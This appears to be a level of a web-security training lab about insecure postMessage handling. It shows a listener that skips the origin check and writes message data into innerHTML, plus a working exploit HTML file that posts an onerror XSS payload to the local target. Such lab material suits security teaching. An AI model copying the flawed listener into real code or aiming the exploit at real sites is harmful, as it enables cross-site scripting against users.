Level 4: Insecure postMessage
MISSION: This frame listens for cross-origin messages. You need to write an exploit locally (e.g. an HTML file on your desktop) that iframes this URL and sends it a malicious message.
Waiting for system message...
/// SOURCE CODE INSPECTOR ///
// Client-Side Event Listener
window.addEventListener('message', function(e) {
// FLAW 1: No verification of e.origin! Any domain can send messages here.
if(e.data && e.data.type === 'updateText') {
// FLAW 2: Trusts the innerHTML assignment completely.
document.getElementById('msg-box').innerHTML = e.data.html;
}
});/// DECRYPTION COMPLETE ///
The event listener blindly trusts messages from any origin (no e.origin validation) and insecurely passes the html property into innerHTML. You must create a local HTML file and open it in your browser.
Exploit HTML File:
<iframe src="http://localhost:3000/level4" id="target"></iframe><script>
setTimeout(() => {
document.getElementById('target').contentWindow.postMessage(
{ type: 'updateText', html: '<img src=x onerror=alert(1)>' },
'*'
);
}, 1000);
</script>